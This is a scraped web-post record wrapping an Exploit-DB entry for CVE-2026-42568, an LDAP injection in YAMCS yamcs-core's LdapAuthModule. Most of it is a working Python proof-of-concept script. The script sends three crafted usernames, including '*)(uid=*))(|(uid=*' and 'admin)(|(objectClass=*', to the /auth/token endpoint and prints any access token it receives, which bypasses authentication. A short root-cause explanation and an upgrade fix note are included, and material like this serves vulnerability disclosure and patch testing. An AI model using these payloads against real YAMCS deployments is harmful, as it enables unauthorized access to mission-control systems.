{“lastseen”:”2026-05-30T15:32:49″,”description”:”Exploit Title: YAMCS yamcs-core 5.12.7 – LDAP Injection Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https:\/\/yamcs.org Software Link: https:\/\/github.com\/yamcs\/yamcs Version: 1 else \\”http:\/\/localhost:8090\\” base =…”,”published”:”2026-05-30T00:00:00″,”modified”:”2026-05-30T00:00:00″,”type”:”exploitdb”,”title”:”YAMCS yamcs-core 5.12.7 – LDAP Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52603″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42568″],”sourceData”:”# Exploit Title: YAMCS yamcs-core 5.12.7 – LDAP Injection \\r\\n# Date: 2026-05-27\\r\\n# Exploit Author: Daniel Miranda Barcelona (Excal1bur)\\r\\n# Vendor Homepage: https:\/\/yamcs.org\\r\\n# Software Link: https:\/\/github.com\/yamcs\/yamcs\\r\\n# Version: \\u003c 5.12.7\\r\\n# Tested on: Linux\\r\\n# CVE: CVE-2026-42568\\r\\n# Category: Remote \/ Auth Bypass\\r\\n# Advisory: https:\/\/github.com\/yamcs\/yamcs\/security\/advisories\/GHSA-cqh3-jg8p-336j\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\n\\”\\”\\”\\r\\nCVE-2026-42568 \u2014 YAMCS LDAP Injection in LdapAuthModule\\r\\n=========================================================\\r\\nThe username parameter in LdapAuthModule is inserted directly\\r\\ninto LDAP search filters without RFC 4515 escaping.\\r\\n\\r\\nRoot cause (LdapAuthModule.java):\\r\\n var filter = userFilter.replace(\\”{0}\\”, username);\\r\\n\\r\\nWith userFilter=(uid={0}) and username=*)(uid=*))(|(uid=*\\r\\nResult: (uid=*)(uid=*))(|(uid=*) \u2014 universal match, auth bypass.\\r\\n\\r\\nOnly affects instances with LdapAuthModule configured.\\r\\n=========================================================\\r\\n\\”\\”\\”\\r\\n\\r\\nimport requests\\r\\nimport sys\\r\\nimport json\\r\\n\\r\\ndef main():\\r\\n target = sys.argv[1] if len(sys.argv) \\u003e 1 else \\”http:\/\/localhost:8090\\”\\r\\n base = target.rstrip(\\”\/\\”)\\r\\n\\r\\n print(\\”=\\” * 65)\\r\\n print(\\” CVE-2026-42568 \u2014 YAMCS LDAP Injection PoC\\”)\\r\\n print(f\\” Target: {target}\\”)\\r\\n print(\\” Requires: LdapAuthModule configured in yamcs.yaml\\”)\\r\\n print(\\”=\\” * 65)\\r\\n\\r\\n payloads = [\\r\\n {\\r\\n \\”name\\”: \\”Universal bypass\\”,\\r\\n \\”username\\”: \\”*)(uid=*))(|(uid=*\\”,\\r\\n \\”password\\”: \\”anything\\”,\\r\\n },\\r\\n {\\r\\n \\”name\\”: \\”Targeted bypass (admin)\\”,\\r\\n \\”username\\”: \\”admin)(|(objectClass=*\\”,\\r\\n \\”password\\”: \\”wrongpassword\\”,\\r\\n },\\r\\n {\\r\\n \\”name\\”: \\”Wildcard match\\”,\\r\\n \\”username\\”: \\”op*\\”,\\r\\n \\”password\\”: \\”anything\\”,\\r\\n }\\r\\n ]\\r\\n\\r\\n for i, p in enumerate(payloads, 1):\\r\\n print(f\\”\\\\n[{i}] {p[‘name’]}\\”)\\r\\n print(f\\” username: {p[‘username’]}\\”)\\r\\n print(f\\” password: {p[‘password’]}\\”)\\r\\n\\r\\n try:\\r\\n resp = requests.post(f\\”{base}\/auth\/token\\”,\\r\\n data={\\r\\n \\”grant_type\\”: \\”password\\”,\\r\\n \\”username\\”: p[\\”username\\”],\\r\\n \\”password\\”: p[\\”password\\”]\\r\\n }, timeout=5)\\r\\n\\r\\n print(f\\” HTTP: {resp.status_code}\\”)\\r\\n\\r\\n if resp.status_code == 200:\\r\\n token = resp.json().get(\\”access_token\\”, \\”\\”)\\r\\n print(f\\” [!!!] AUTH BYPASSED\\”)\\r\\n if token:\\r\\n print(f\\” [!!!] Token: {token[:50]}…\\”)\\r\\n elif resp.status_code == 401:\\r\\n print(f\\” [-] 401 \u2014 LDAP may not be configured\\”)\\r\\n elif resp.status_code == 403:\\r\\n print(f\\” [+] 403 \u2014 Patched or LDAP disabled\\”)\\r\\n\\r\\n except requests.exceptions.ConnectionError:\\r\\n print(f\\” [-] Connection refused \u2014 is YAMCS running?\\”)\\r\\n except Exception as e:\\r\\n print(f\\” [-] Error: {e}\\”)\\r\\n\\r\\n print(\\”\\\\n\\” + \\”=\\” * 65)\\r\\n print(\\” Fix: Upgrade to yamcs-core \\u003e= 5.12.7\\”)\\r\\n print(\\”=\\” * 65)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52603″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52603″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-30T15:32:49″,”description”:”Exploit Title: YAMCS yamcs-core 5.12.7 – LDAP Injection Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https:\/\/yamcs.org Software Link: https:\/\/github.com\/yamcs\/yamcs Version: 1 else…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-58610","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n